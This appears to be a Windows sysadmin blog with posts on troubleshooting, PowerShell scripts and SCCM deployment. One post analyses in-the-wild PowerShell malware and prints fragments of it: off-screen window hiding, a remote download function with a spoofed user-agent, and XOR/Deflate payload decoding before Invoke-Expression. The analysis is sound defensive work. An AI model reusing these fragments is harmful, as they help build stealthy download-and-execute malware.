Read-Only USB Flash Drive Issue


I came across an interesting issue with a Kingston DataTraveler Micro USB Flash Drive yesterday that I thought worth sharing.

Initially, I spotted an error in the System Event Log – “{Delayed Write Failed} Windows was unable to save all the data for the file … The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.”  Since I hadn’t been yanking USB drives out without formally ejecting them, this was a little concerning.  Here’s the full error:


A scroll through the System Event Log was less than reassuring, with many errors with Source disk and Ntfs:


The error from source disk was “An error was detected on device \Device\Harddisk2\DR7 during a paging operation.”  It’s not immediately clear how to tally “\Device\Harddisk2\DR7” to a physical drive in the PC:


The error from source Ntfs was “The system failed to flush data to the transaction log.  Corruption may occur in VolumeId: E:, DeviceName: \Device\HarddiskVolume11. (The I/O device reported an I/O error.)”  That’s a more helpful error as it gives a drive letter that corresponded to one of my USB Flash Drives:


On opening the Disk Management MMC, it can be seen that the Disk number shown on the left side of the GUI that holds the partition bearing this E: drive matches the Harddisk number (2) in the disk event log entry.  So the two errors match up:


My first thought was to try to scan the drive for any errors and fix them.  The computer then bizarrely claimed that “The disk is write protected.”  This is not the sort of USB Drive that has a physical write-protect switch:


I then wondered if my AntiVirus was interfering, so I tried disabling both it and my AntiExploit software but to no avail.  After some reading around, I discovered that diskpart can be used to view and alter the Read-Only status of a drive via its detail disk command.  I first use list disk to find the ID of the drive (by looking at the Size of the disks) and then I use select disk to set the focus to that drive.  Note that the results include the arrowed lines “Current Read-only State : Yes” and “Read-only : No”:


I had seen examples online where both attributes were set to “Yes” and the recommended fix was to try the command attrib disk clear readonly.  I tried it anyway but it made no difference, with the attributes appearing the same afterwards:


There were also references online on this subject to registry key HKEY_LOCAL_Machine\System\CurrentControlSet\Control\StorageDevicePolicies having a DWORD value WriteProtect that needed changing from 1 to 0.  I didn’t have this key or value on my system.  I then suspected this was almost certainly a hardware failure of some sort and then confirmed the drive did not work on a different computer.

More Googleage revealed what had happened.  It appears to be a deliberate feature in the drive firmware that when it detects that the drive is having problems, it becomes permanently write-protected to protect the data on there from further loss.

I contacted Kingston and the end result is that the drive is being replaced under warranty.  I would like to add that this is the second dealing I’ve had with Kingston’s technical support (a different reason previously) and I have found them outstanding both times!





When a user logs onto a domain PC, the authenticating domain controller updates a non-replicated attribute of the user account called lastLogon in its copy of the domain partition.  There is another attribute called lastLogonTimeStamp (since Server 2003) that is replicated but it is not updated on every single logon.  To reduce replication traffic, it is only updated when the value is (by default) 9 to 14 days out of date.  This attribute is designed for assisting detecting stale accounts, not getting a definitive date.  More info is here.

Sometimes though, it can be useful to know exactly when a user last logged on.  Here’s a script I wrote today that queries all domain controllers and gets the lastLogon attribute from all of them to find which is the newest and thus actual Last Logon.  The attribute is stored in UTC format and so returned as an Int64.  Interestingly, PowerShell provides a helpful extra property that contains a DateTime translated version of lastLogonTimeStamp called lastLogonDate.  My script has to do the translation of the lastLogon attribute’s format itself.  See the notes after the script.

function Get-LastLogonDateTime {
#requires -Version 3.0 -Modules ActiveDirectory
    param (
        [Parameter(Mandatory, ValueFromPipeline, HelpMessage='Enter one or more usernames separated by commas.')]

    BEGIN {
        $DCs = Get-ADDomainController -Filter '*'

        foreach ($user in $Username) {
            Write-Verbose ('Processing user "{0}"...' -f $user)
            try {
                Get-ADUser -Identity $user | Out-Null
            } catch {
                Write-Error ('User "{0}" does not exist.' -f $user)
            [Int64]$lastLogon = 0
            foreach ($DC in $DCs) {
                $domainController = $DC.HostName
                Write-Verbose ('Querying Domain Controller "{0}"...' -f $domainController)
                $dcLastLogon = Get-ADUser -Identity $user -Server $domainController -Properties lastLogon | Select-Object -ExpandProperty lastLogon
                $lastLogon = [Math]::Max($lastLogon, $dcLastLogon)
            $lastLogonDateTime = [DateTime]::FromFileTime($lastLogon)
            $obj = [pscustomobject]@{
                'Username' = $user
                'LastLogonDateTime' = $lastLogonDateTime
            Write-Output $obj

    END {}

When looping through each domain controller in turn, I need to compare the returned lastLogon attribute with what has already been found and just keep track of the newest value.  Since its an integer, I merely need to keep the greatest one.  The easiest way to do this is to use the Max( xy ) static method of .NET’s [Math] class which returns the biggest of two numbers.  I pass it the value from the currently-queried domain controller and the previous biggest value seen.

$lastLogon = [Math]::Max($lastLogon, $dcLastLogon)

On the first time through the loop, the value being compared with is set to 0 but note I had to strongly type the variable holding it as an Int64.

[Int64]$lastLogon = 0

This is because the lastLogon attribute is an Int64 and the Math.Max() method expects the two numbers being compared to be of the same type.  If I’d initialised that $lastLogon variable without strongly typing it, it would have been an Int32 by default, which would make the method call fail.  Yes, I found this out the hard way!

Once the newest value is obtained, the script then converts it to a normal [DateTime] value by using a static method on the [DateTime] class.

$lastLogonDateTime = [DateTime]::FromFileTime($lastLogon)

I’ve returned the final value as an Object and written the function so it can handle multiple usernames by the parameter or from the pipeline.

I’m considering writing a meatier version 2 that will also try and get the hostname of the computer the user logged on to from the Security log of the domain controller that authenticated them…!

Enabling PowerShell Remoting (Part 2)


, ,

Some time ago I wrote a fairly-extensive post about an issue I was seeing with failure to register PowerShell Remoting Endpoints (PSSessionConfigurations) when enabling PSRemoting via Group Policy.

I never did solve the underlying problem.  The eventual script I used is different to the one that’s in the old post, so here is the newer one.  Group Policy handles the Services etc, and then this runs in a Computer Startup Script:

#requires -Version 3
# Add missing PSSessionConfigurations (Remoting Endpoints)

Start-Service -Name 'WinRM'

$faulty = $false

if ((Get-PSSessionConfiguration -Name 'Microsoft.PowerShell' -ErrorAction SilentlyContinue) -eq $null) {
    $faulty = $true

if ((@(Get-WmiObject -Class Win32_Processor -Property AddressWidth)[0].AddressWidth) -eq 64) {
    if ((Get-PSSessionConfiguration -Name 'Microsoft.PowerShell32' -ErrorAction SilentlyContinue) -eq $null) {
        $faulty = $true

if ($PSVersionTable.PSVersion.Major -ge 3) {
    if ((Get-PSSessionConfiguration -Name 'Microsoft.PowerShell.Workflow' -ErrorAction SilentlyContinue) -eq $null) {
        $faulty = $true

if ($faulty) {
    try {
        Enable-PSRemoting -Force -SkipNetworkProfileCheck | Out-Null
    } catch {
        try {
            Enable-PSRemoting -Force -SkipNetworkProfileCheck | Out-Null
        } catch {

    Restart-Service -Name 'WinRM'

A Computer Startup PowerShell Script does add to boot time but it’s the best solution I could find that worked consistently without doing anything too weird that might cause future problems.  I hope you find it helpful and if anyone ever finds out what the actual cause of the missing endpoints issue is, please post a comment, thanks!

SQL Restore Issue


Saw an interesting error message today when a colleague was doing a test SQL restore onto a spare server.  Neither of us are SQL people…!  Here’s the error:


We went back to the restore wizard and set its options again but this time clicked the Script button at the top to copy the T-SQL to the clipboard.


The T-SQL was as follows.  I’ve shortened paths, changed names and added line-breaks:

FROM DISK = N'D:\Restore\MSSQL\Backup\database\backupfilename.bak' WITH FILE = 1,
MOVE N'dbname_SYSTEM' TO N'D:\MSSQL\DATA\dbfilename.mdf',
MOVE N'dbname_DATA' TO N'D:\MSSQL\DATA\dbfilename.mdf',
MOVE N'dbname_INDEX' TO N'D:\MSSQL\DATA\dbfilename.mdf',
MOVE N'dbname_INDEX_2' TO N'D:\MSSQL\DATA\dbfilename.NDF',
MOVE N'dbname_ARCHIVE' TO N'D:\MSSQL\DATA\dbfilename.NDF',
MOVE N'dbname_ARCHIVE_2' TO N'D:\MSSQL\DATA\dbfilename.NDF',
MOVE N'dbname_LOG' TO N'D:\MSSQL\DATA\dbfilename.ldf',
MOVE N'dbname_LOG_2' TO N'D:\MSSQL\DATA\dbfilename.ldf',

From that, you can see multiple parts of the database going to the same destination filename which must explain the error we were getting.
Pasting the T-SQL into a new query and adding suffices to the stem of those filenames to make them unique let the restore work and the database tables, when checked, looked fine.

Recognising the NDF file extension as being from Secondary Data Files, I next had a look at what was going on with the disposition of the files on the live database:


As you can see, the files are normally spread over 7 folders on 4 drives but we were restoring the lot for test purposes into one folder and so the filenames were clashing.

Rather than tweak the T-SQL like we did, I see we could just change the destinations in the second page of the Restore wizard next time in the “Restore As” column:



Barcode Printing Bizareness


We have a third-party web app that as part of its functionality prints labels with barcodes on.  This was working fine until PCs were upgraded to IE11 and then the printed barcodes could no longer be read by a hand-held barcode scanner!  To confirm the behaviour, downgrading IE back to IE9 fixed the problem and upgrading that back to IE11 broke it once more.  Printing from IE11 to a standard Laserjet printer instead of the label printer produced output that could be scanned successfully.

The printer in question is a Toshiba thermal printer that was chosen for its ability to be powered by a rechargeable battery and its ruggedised nature.  Here it is:


It’s using the Seagull Scientific printer drivers from here.  The barcodes are of symbology Code 39.

One thing that was noted was that the printer is only 203 DPI which means it could be at risk of struggling to fit the needed level of detail into a given space if the barcode is below a certain size.  Measuring a scannable and non-scannable printout showed no difference in printed width (I’d wondered if there was some scaling going on in IE11).  Looking really closely at the printout, the non-scannable barcode did look more indistinct on the thinnest black lines but there were also places where the line patterns for repeated character zeros were inconsistent.  It reminded me of what happens when you shrink an image down without resampling – which is presumably something like what is actually going on – though why differing IE versions should affect this was not clear.

Here are some close-ups of part of the printed barcodes where you can see the most obvious difference in the two printouts.

 Working – from IE9  Faulty – from IE11
 Barcode-Good  Barcode-Bad

Today I found this extremely useful webpage.  To quote:

When printing barcodes fonts to a printer with less then 600dpi, such as a thermal 203dpi printer, the print should be no smaller than 20 points. Otherwise, print at the point sizes specified in the chart below.


It is necessary to use the point sizes specified in the chart above with low resolution printers so that there are the exact number of dots required to create the exact ratio of bar and space sequences. Because fonts cannot calculate or perform operations on their own, they have no method to compensate for low resolution devices.

We had a look at the template that was generating the label and the barcode font was 10 point.  Increasing this to 12 to match the chart above did indeed fix the problem!  We also tried 6 but it was too tiny and wouldn’t scan.

Despite being fixed this still left the question of what was different between IE9 and IE11 that could explain it all.  I’m assuming that it must be something to do with the IE rendering engine behaving differently in IE11.  Remembering from past experiences that printer drivers interact with graphics drivers it made me think about graphics rendering specifically.  Although the following setting was also in IE9, I tried ticking it on an affected IE11 machine:


That fixed the problem and enabled even a 10 point barcode to print in scannable form from IE11!  I don’t fancy leaving that ticked because of potential performance degradation and unknown issues with other current and future web apps, so we’ll be sticking with 12 point for now.  My next – and probably final – port of call would be to try an updated [on-board] graphics driver.

PowerShell Malware

Saw my first example today of an in-the-wild PowerShell Malware on an infested laptop.  It had already been cleaned by MalwareBytes but I looked it over with Process Explorer and Autoruns and spotted a strange Scheduled Task.

The task name was the GUID “{080A7D47-0B0F-0B0B-0511-7D0A7F781109}” which I’m pasting here in case it’s constant for all infected machines.  The task was set to run at 18:01 and run PowerShell with the usual -ExecutionPolicy Bypass and the -EncodedCommand parameter followed by a long string.

I decoded the string with the following:

$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))


I put the result in the ISE and then reformatted it to make it readable.  The first thing the script did was set all Preference variables to SilentlyContinue except for the ErrorAction one which it set to Stop.  Next was a particularly interesting bit of code.  I’ve removed two Try-Catch constructs for readability:

function sr($p) {
	New-Item -Path $p | Out-Null
	try {
		New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664 | Out-Null
	} catch {
		Set-ItemProperty -Path $p -Name $n -Value 201329664 | Out-Null


I’d not really looked at that referenced area of the registry before.  If I look at my own HKEY_CURRENT_USER\Console , I see the following subkeys which all clearly contain various values to do with console-type window positions, sizes, colours etc:


The piece of code above, is creating keys for the PowerShell Console app, svchost.exe and taskeng.exe and then giving them a WindowPosition value of 201329664.  The documentation for that value shows that the high and low order bytes of it determine the X and Y positions respectively.  In Hex, that value is 0C00 0C00.  0C00 is decimal 3072.  What this ensures is that if PowerShell or the other processes open a Window, it will open off-screen at coordinates 3072×3072!

The code next exits if PowerShell is less than v2, or if the OS is older than XP SP2, or if the current user is not an Administrator.  The latter test uses this neat little one-liner:

 if ( -not ( [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { break }

Next, there is a long dubious URL in a string which is then passed to the following function to download data from it using the System.Net.WebClient class.  Note the User-Agent header being passed:

function wc($url){
	$rq = New-Object System.Net.WebClient
	$rq.Headers.Add("user-agent","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)")
	return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url))

The returned data is then decoded from Base64, deobfuscated (Xor) and decompressed with the following function:

function dstr($rawdata){
	$bt = [Convert]::FromBase64String($rawdata)
	$key=$bt[1] -bxor 170
	for ( $i=2; $i -lt $bt.Length; $i++){
		$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255))
	return ( New-Object IO.StreamReader( New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt,2,($bt.Length-$ext))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()

There’s some rather developery .NET classes in there for me to look up when I’m feeling particularly bored…!

I suspect you can guess how the code ends.  The returned string is passed to Invoke-Expression to be executed to cause the next stage of the infection.

Sadly, the tale ends here, as the URL given no longer has any live code to download.  😦

Preventing SCCM Mid-Install Login Pain



I tend to set many of my SCCM packages to run when no user is logged on.  For example, I don’t want to be trying to update a piece of software if a user might already have the old version open.

Sometimes though, such a package takes some time to run and there’s a chance the user might log in mid-way.  This might not necessarily be a problem – but could be if your package ends by triggering a reboot.  I recently blogged about installing IE11.  There, eight pre-requisite updates had to be installed followed by a reboot before IE11 itself was installed.  That’s quite a time window where a user might log in.  One way around this is to schedule the package for out-of-hours but then if the user doesn’t leave it logged off overnight for a while, any subsequently-advertised packages are held up, waiting for the scheduled one to be run first.

What would be nice, is to be able to display a message to the user to tell them not to log in whilst the install is in progress.  It is possible to change the logon/lock screen background but if this is done via a script while no one is logged in, it won’t visibly take effect until after a reboot.


To do this, make a suitably-sized image no more than 256KB in size and save it as c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg (making any missing folders as required).  Then to make this take effect you need to set a registry value called OEMBackground with a value of 1 within key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background

For my IE11 installer, the first package to run merely sets the above background and then reboots.  With the background now changed, part two then installs the 8 pre-requisites and reboots.  Part three then does the IEAK-derived install and reboots.  Finally, part four does the RunOnce stuff, applies a cumulative update, removes the above wallpaper and reboots once more!  Total runtime of 15 mins with the warning on-screen throughout.  Anyone who logs in during that time despite the warnings is deserving of any subsequent pain!

Here’s the simple code inside the first package to set the background:

reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background /v OEMBackground /t REG_DWORD /d 1 /f >nul
if not exist c:\Windows\System32\oobe\info\backgrounds mkdir c:\Windows\System32\oobe\info\backgrounds
if exist c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg ren c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg backgroundDefault.bak
copy /Y backgroundDefault.jpg c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg >nul

and here’s the code in the last one to remove it again:

reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background /v OEMBackground /t REG_DWORD /d 0 /f >nul
del /F c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg >nul
if exist c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.bak ren c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.bak backgroundDefault.jpg

I leave it to SCCM to handle all the rebooting.  You’ll see I’ve coded it to preserve any file already in there, though as far as the registry is concerned, I’m assuming a custom screen isn’t being used.  Also, this hasn’t been written for use with a 64-bit OS where I’d have to work around a 32-bit SCCM 2007 Client process needing access to 64-bit System32 etc.

After initial testing, I found that even users within the IT Department were logging in despite the on-screen message!  They either didn’t read it fully, or just plain ignored it.  I’ve now switched to an ugly in-your-face vivid red screen with a big white font.  Now we’ll probably have people think they’re infected with malware instead…

Upgrading to IE11 with IEAK and SCCM



We’re finally getting to be in a position where we can upgrade more old PCs to IE11.  The problem is, how best to do so via SCCM (2007).  As on previous occasions, we want to use the IEAK to do a little customisation such as stripping out Accelerators, adding a Search Engine, killing off First-Run Wizards, etc.

One thing we found previously when we upgraded to IE9 from IE8, was that after installing an IEAK-derived package and rebooting, you have to log in once as an administrative user for Windows to process some RunOnce settings, as otherwise you end up in a bit of a mess.  We once had to remote to a number of machines just to log in once as admin to complete a failed IEAK v9-based upgrade.  The subsequent fix for later installs was to daisy-chain the IEAK SCCM package with a second package that ran after reboot and used some VBScript to parse the RunOnce registry key and run (and then remove) all the things in there!  Messy but successful.  There’s more info on this issue (which is also seen with OSD) here: “Deploying IE9 with SCCM OSD Task Sequence“.  The RunOnce Runner script I use is based on the mechanism of this one here: “OSD and RunOnce“.  It may be this problem no longer exists with IEAK v11, but I’m playing it safe…

On to IE11 specifically.  I made the usual package with the IEAK and tried it out but it soon became clear (as I half-expected) that it was trying to download and install pre-requisites, but since SCCM packages run under the System context, this was not getting through our web filtering software.  The list of pre-requisites (both required and recommended) is in the following Microsoft KB article: “Prerequisite updates for Internet Explorer 11“.

Reading around some articles online saved me further pain as it turns out that just installing those updates followed immediately by the IEAK package without a reboot via a batch file won’t work as it still goes looking online.  The reference for this is on the Technet forums here: ” Packaging IE11 prerequisite updates with IEAK“.

There’s also a nice fix in that discussion for an install of IE11 and pre-requisites without an intervening reboot, for if you’re using the normal IE installer and not an IEAK-derived one.  On the same subject, see also Microsoft’s KB article here: “How to create an all-inclusive deployment package for Internet Explorer 11“.

My solution is three SCCM packages that run one after the other with a reboot after each.  The third is the one that is actually advertised to the PCs and it contains the setting to make it run package two first and that in turn contains the setting to run package one!  Part 1 is the pre-requisite patches and a reboot.  Part 2 is the IEAK package and a reboot.  Part 3 is the RunOnce Runner followed by an IE cumulative update and a final reboot!!

I discovered one complication with the above solution.  If the pre-requisites package tries to install a patch that is already installed, this returns an error which makes SCCM count package one as having failed and then doesn’t attempt to run parts two and three.  I therefore use an explicit exit 0 to end the first batch file.  I’m also letting SCCM handle the reboots, rather than putting a shutdown.exe command in.

The packages will be set to run when no user is logged on and I suspect we will set it for out-of-hours too.  Longer term, I hope we can just push out the pre-requisites with WSUS separately and then deploy a simpler IEAK-based installer with SCCM.

Here is the batch code I’ve used.  Note I’ve copied in filever.exe to look for an already-upgraded IE.  I also use it in the final package to look for a failed upgrade and force a specific return code to flag that up in the SCCM advertisement report.

Package 1:

rem Exit if already has IE11.
filever.exe /B /A /D "C:\Program Files\Internet Explorer\iexplore.exe" | find " 11." >nul
if '%errorlevel%'=='0' exit 0

rem Install pre-requisites.
wusa.exe Windows6.1-KB2533623-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2639308-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2670838-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2729094-v2-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2731771-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2786081-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2834140-v2-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2882822-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2888049-x86.msu /quiet /norestart

exit 0

Package 2:

rem Exit if already has IE11.
filever.exe /B /A /D "C:\Program Files\Internet Explorer\iexplore.exe" | find " 11." >nul
if '%errorlevel%'=='0' exit 0

rem Install IEAK package.
start /wait msiexec.exe /i IE11-Setup-Full-x86.msi /quiet /norestart

exit 0

Package 3:

rem Return an error if upgrade has been unsuccessful.
filever.exe /B /A /D "C:\Program Files\Internet Explorer\iexplore.exe" | find " 11." >nul
if '%errorlevel%'=='1' exit 666

rem Run the IEAK Run-Once tasks as admin.
c:\Windows\System32\cscript.exe //nologo RunOnceRunner.vbe

rem Apply May 2016 cumulative update.
c:\Windows\System32\wusa.exe IE11-Windows6.1-KB3154070-x86.msu /quiet /norestart

exit 0

I hope all the above proves useful for someone else!

The word “package” in this article has been sponsored by Alex Davies…

Editing Multi-String Registry Values



I was writing a function earlier to uninstall GearASPI which iTunes always insists on putting on my machine.  The GEAR website has a list of manual steps but no uninstaller.  One of the steps which will be familiar to anyone who has had to fight with disappearing CD drives in the past is to edit the UpperFilters multi-string registry value.  This used to be a relatively common problem caused by various pieces of CD-writing software that didn’t play nicely together.  Advice was often to just delete the UpperFilters and LowerFilters values to restore CD drive functionality but that would affect all software that had altered those keys and not just the one that was playing badly.  The GEAR site wisely says to edit the values if they’re present rather than deleting them.  So the question becomes, how to safely edit a registry Multi-String value (REG_MULTI_SZ) from PowerShell.

The Registry PSProvider has always confused me with its keys being Items and its values being ItemProperties.  Here was what I started with:

$regKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4d36e965-e325-11ce-bfc1-08002be10318}'
$upperFilters = Get-ItemProperty -Path $regKey -Name 'UpperFilters'

Viewing the returned variable gives us the following:

UpperFilters : {GearASPIwdm}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e965-e325-11ce-bfc1-08002be10318}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class
PSChildName : {4d36e965-e325-11ce-bfc1-08002be10318}
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

That’s not really very helpful so I tried two ways of getting at the actual value:

Get-ItemProperty -Path $regKey -Name 'UpperFilters' | Select-Object -ExpandProperty 'UpperFilters'
(Get-ItemProperty -Path $regKey -Name 'UpperFilters').UpperFilters

My UpperFilters value only contained a single string.  In this case, the first technique returned a [string] whereas the second one returned the desired [string[]].

If the registry value contains no strings, the first technique errors because null is returned and the second technique gives [string[]] again as desired.

I always want [string[]] so technique two looks safe.  Next comes the problem of how to remove a given value from a string array.

Having looked at the methods of the returned variable, I tried .Remove():

$newUpperFilters = $upperFilters.Remove("gearaspiwdm")

That was less than useful:

Exception calling "Remove" with "1" argument(s): "Collection was of a fixed size."

One method I tried yesterday to get around this was casting the original Get-ItemProperty to an [ArrayList] and using its .Remove() method:

[System.Collections.ArrayList]$upperFilters = (Get-ItemProperty -Path $regKey -Name 'UpperFilters').UpperFilters
$newUpperFilters = $upperFilters.Remove('gearaspiwdm')

Oddly, that’s working for me today but yesterday I was finding that the .Remove() was being case-sensitive!  I therefore went on to other things.  This is what I ended up with:

$newUpperFilters = $upperFilters | Where-Object { $_ -ne 'gearaspiwdm' }

That successfully removed the desired string but if there were no other strings left, I ended up with a null to deal with.  I wanted to always get a [string[]] back.

I tried various ways of casting the result:

[string[]]$newUpperFilters = $upperFilters | Where-Object { $_ -ne 'gearaspiwdm' }
[Array]$newUpperFilters = $upperFilters | Where-Object { $_ -ne 'gearaspiwdm' }
$newUpperFilters = [string[]]($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })
$newUpperFilters = [Array]($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })
$newUpperFilters = @($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })

Out of all of those, only the last entry always returned a collection even when removal of the matching string left nothing.  The others return null but the last one gives back an [object[]].  Though not actually necessary, that can be converted into a string array with a simple cast:

[string[]]$newUpperFilters = @($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })

Whilst writing this up today, I realised that there was a much easier method that would always return a [string[]]:

[string[]]$newUpperFilters = $upperFilters -notmatch 'gearaspiwdm'


Note that my final function included Test-Path on registry keys and a Remove-ItemProperty if the UpperFilters ended up empty (based on the .Count property of $newUpperFilters).

Now I’m off to re-consult Bruce Payette’s bible and see what he says about Type conversion.  I think I understand the difference between all those casts I tried above…


Having now done some reading, one thing that was seemingly clarified for me is why @() behaves differently to [Array] in ensuring I always got a collection back.

The clue was Bruce’s name for @( … ) as an “Array Subexpression”.  I guess its physical similarity to the subexpression $( … ) should have been a clue.  Apparently @( … ) is equivalent to [object[]] $( … )

Except when I tested this, I didn’t see the same behaviour!

@(([string[]]'Test') | where {$_ -ne 'Test'}).GetType().Name

That returns “Object[]”.

[object[]]$(([string[]]'Test') | where {$_ -ne 'Test'}).GetType().Name

That returns an error due to null being returned:

You cannot call a method on a null-valued expression.

I remain confused!!

RAM Leak on Windows 10

Someone online was telling me earlier that they needed more RAM in their new Windows 10 machine despite already having 16GB in their system.  Their RAM use in Task Manager’s Performance tab was in the order of 15GB (even when idle) but the Details tab did not show any one process with more than around 150MB used.

I talked them through running Sysinternals RAM Map.  On the screenshot he sent, the Non-Paged Pool histogram portion was massive.  Here’s a close-up showing the figures:


This suggested a duff driver and enabled me to do a more meaningful Google search on the issue.  There were a number of hits describing the same problem all pointing the finger at the same cause.  Here’s one such page.

As on the above, he did indeed have an MSI motherboard with Killer networking.  After a driver update from here, the problem went away.  Plan B would have been to disable the Network Data Usage Monitoring service with a reghack as suggested by the sites I found.